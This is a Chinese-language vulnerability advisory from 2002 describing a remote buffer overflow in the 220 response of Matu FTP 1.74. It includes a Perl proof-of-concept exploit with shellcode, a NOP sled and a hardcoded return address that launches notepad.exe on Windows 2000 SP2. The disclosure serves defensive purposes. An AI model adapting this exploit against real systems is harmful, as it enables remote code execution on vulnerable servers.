Matu FTP存在远程缓冲溢出漏洞发布时间:2002-04-24 更新时间:2002-04-24 严重程度:高 威胁程度:远程管理员权限 错误类型:边界检查错误 利用方式:服务器模式 受影响系统 Matu FTP Version 1.74.详细描述 Matu FTP是日文的FTP服务程序,其中220命令存在缓冲溢出,可导致任意代码可执行。如220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF> 可导致缓冲溢出。 测试代码 #!/usr/local/bin/perl #------------------------------------------------------ # Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2) # ( run under inetd ) # written by Kanatoko <anvil@jumperz.net> # http://www.jumperz.net/ #------------------------------------------------------ $|=1; #egg written by UNYUN (http://www.shadowpenguin.org/) $egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2"; $egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7"; $egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C"; $egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB"; $egg .= "\xFD\xE8\xD4\xFF\xFF\xFF"; $egg .= "notepad.exe"; #egg_address = 0x0012F43C $buf = "\x90" x 217; $buf .= $egg; $buf .= "A" x 2; $buf .= "\x3C\xF4\x12\x00"; $buf .= "B" x 80; print "220 $buf\r\n"; 解决方案 尚无 相关信息 Kanatoko (anvil@jumperz.net) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-04/0310.html |
